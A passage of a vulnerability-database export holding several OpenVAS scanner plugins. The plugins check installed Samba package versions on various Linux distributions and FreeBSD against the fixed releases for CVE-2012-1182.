exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc1\", rpm:\"lib64talloc1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64talloc-devel\", rpm:\"lib64talloc-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb1\", rpm:\"lib64tdb1~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64tdb-devel\", rpm:\"lib64tdb-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.3.12~0.9mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", 
rpm:\"libnetapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-devel\", rpm:\"libsmbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-static-devel\", rpm:\"libsmbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes0\", rpm:\"libsmbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbsharemodes-devel\", rpm:\"libsmbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mount-cifs\", rpm:\"mount-cifs~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nss_wins\", rpm:\"nss_wins~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-server\", rpm:\"samba-server~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi0\", rpm:\"lib64netapi0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64netapi-devel\", rpm:\"lib64netapi-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0\", rpm:\"lib64smbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-devel\", rpm:\"lib64smbclient0-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbclient0-static-devel\", rpm:\"lib64smbclient0-static-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64smbsharemodes0\", rpm:\"lib64smbsharemodes0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"lib64smbsharemodes-devel\", rpm:\"lib64smbsharemodes-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient0\", rpm:\"lib64wbclient0~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64wbclient-devel\", rpm:\"lib64wbclient-devel~3.5.3~3.5mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:57:35", "description": "Check for the Version of libsmbclient", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2012:0465 centos6 ", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-12-26T00:00:00", "id": "OPENVAS:881179", "href": "http://plugins.openvas.org/nasl.php?oid=881179", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2012:0465 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n \n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. 
After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"libsmbclient on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-April/018565.html\");\n script_id(881179);\n script_version(\"$Revision: 8245 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-26 07:29:59 +0100 (Tue, 26 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 16:34:03 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2012:0465\");\n script_name(\"CentOS Update for libsmbclient CESA-2012:0465 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of libsmbclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != 
NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:45", "description": "The remote host is missing an update for the 'samba4' package(s) announced via the referenced advisory.", 
"cvss3": {}, "published": "2012-05-04T00:00:00", "type": "openvas", "title": "Fedora Update for samba4 FEDORA-2012-6349", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864213", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6349\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/079715.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864213\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-04 10:46:43 +0530 (Fri, 04 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2012-6349\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6349\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC15\");\n script_tag(name:\"affected\", value:\"samba4 on Fedora 15\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC15\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~26.alpha11.fc15.6\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:11", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: samba34", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231071279", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071279", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_samba342.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID baf37cd2-8351-11e1-894e-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71279\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-1182\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:59:26 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"FreeBSD Ports: samba34\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n samba34\n samba35\n samba36\n\nCVE-2012-1182\nThe RPC code generator in Samba 3.x before 3.4.16, 3.5.x before\n3.5.14, and 3.6.x before 3.6.4 does not implement validation of an\narray length in a manner consistent with validation of array memory\nallocation, which allows remote attackers to execute arbitrary code\nvia a crafted RPC call.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"samba34\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.4\")>0 && revcomp(a:bver, b:\"3.4.16\")<0) {\n txt += \"Package samba34 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\nbver = portver(pkg:\"samba35\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.5\")>0 && revcomp(a:bver, b:\"3.5.14\")<0) {\n txt += \"Package samba35 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\nbver = portver(pkg:\"samba36\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.6\")>0 && revcomp(a:bver, b:\"3.6.4\")<0) {\n txt += \"Package samba36 version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:00", "description": "Oracle Linux Local Security Checks ELSA-2012-0466", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0466", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123943", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123943", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0466.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123943\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:38 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0466\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0466 - samba3x security update. 
Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0466\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0466.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", 
rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:18", "description": "The remote host is missing an update for the 'samba3x' package(s) announced via the referenced advisory.", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "RedHat Update for samba3x RHSA-2012:0466-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870584", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba3x RHSA-2012:0466-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00003.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870584\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:47 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name:\"RHSA\", value:\"2012:0466-01\");\n script_name(\"RedHat Update for samba3x RHSA-2012:0466-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 